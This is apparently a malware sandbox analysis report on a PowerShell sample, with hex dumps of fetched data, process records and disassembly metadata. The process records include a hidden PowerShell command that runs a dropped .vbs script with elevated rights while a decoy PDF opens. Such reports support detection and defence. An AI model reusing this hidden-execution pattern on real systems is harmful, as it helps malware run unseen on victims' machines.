                                                                                                  2024-12-19 11:50:57 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                                  Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                                  2024-12-19 11:50:57 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                                  Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                                  2024-12-19 11:50:58 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                                  Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:06:50:42
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1"
                                                                                                  Imagebase:0x7ff760310000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:06:50:42
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff70f010000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:06:50:44
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\u40i6i.vbs'"
                                                                                                  Imagebase:0x7ff760310000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:06:50:58
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                                  Imagebase:0x7ff6153b0000
                                                                                                  File size:5'641'176 bytes
                                                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:06:50:59
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                  Imagebase:0x7ff61f300000
                                                                                                  File size:3'581'912 bytes
                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:06:51:00
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                  Imagebase:0x7ff77afe0000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:10
                                                                                                  Start time:06:51:00
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1740,i,2940798524316865410,17864825841672361364,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                  Imagebase:0x7ff61f300000
                                                                                                  File size:3'581'912 bytes
                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Executed Functions

                                                                                                    Function 00007FF886D14F15 Relevance: 1.7, Strings: 1, Instructions: 432COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1682608922.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff886d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @_H
                                                                                                    • API String ID: 0-518063247
                                                                                                    • Opcode ID: 4992cb8038bf00f21a7a6038defa06c987700819de7711abd5aeb11fdf00cd12
                                                                                                    • Instruction ID: 72e9bda36c0d4f65fed05d47680438daeb6c61b75a125836a911bc58ed72b1ba
                                                                                                    • Opcode Fuzzy Hash: 4992cb8038bf00f21a7a6038defa06c987700819de7711abd5aeb11fdf00cd12
                                                                                                    • Instruction Fuzzy Hash: AAD15771D1DA8A4FE7A69B6848555B9BBE0FF06394B1801FED00EC71D3DA5EAC05C382
                                                                                                    Function 00007FF886D121C4 Relevance: .1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1682608922.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff886d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8948373b189f31550cbc9d709fadf71b67e4dc2f6ef31461932988a95c33bd56
                                                                                                    • Instruction ID: 7aa148a160c822fa09f68599d7a9da09c65569b831bd310247ffc8de001c7415
                                                                                                    • Opcode Fuzzy Hash: 8948373b189f31550cbc9d709fadf71b67e4dc2f6ef31461932988a95c33bd56
                                                                                                    • Instruction Fuzzy Hash: 7F21FB22E2DE4A8FE3B597281856278E6D2FF552A0B9801B9D50EC31D7FD5F9C85C301
                                                                                                    Function 00007FF886C43BB5 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1681622810.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff886c40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction ID: e9b25dfc27f7dc763200f4f5e0dd47df3cfa020401669240b1a39ab30b13743e
                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction Fuzzy Hash: 0901A73015CB0C8FD744EF0CE051AA5B3E0FB95360F10052DE58AC3651D636E882CB42

                                                                                                    Executed Functions

                                                                                                    Function 00007FF886D03135 Relevance: .4, Instructions: 432COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1451448063.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ff886d00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 05b039a661abf76def97d58391a306df3a25c258dff1d2e6a843559e8c16a104
                                                                                                    • Instruction ID: fd481e10b46316509821aa39b488b0ec95410491d46127df7f5539c015935f71
                                                                                                    • Opcode Fuzzy Hash: 05b039a661abf76def97d58391a306df3a25c258dff1d2e6a843559e8c16a104
                                                                                                    • Instruction Fuzzy Hash: 91D11432D1DACA4FE7A6DB6948555B9BBA0FF06390B0901BED04EC7093DE1A9C05C393
                                                                                                    Function 00007FF886C333B5 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1450968390.00007FF886C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ff886c30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                    • Instruction ID: b78c99c2b2f0737bca84ff0d1c9dbefaa9413a3007803390516c45da027d104f
                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                    • Instruction Fuzzy Hash: E701677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB46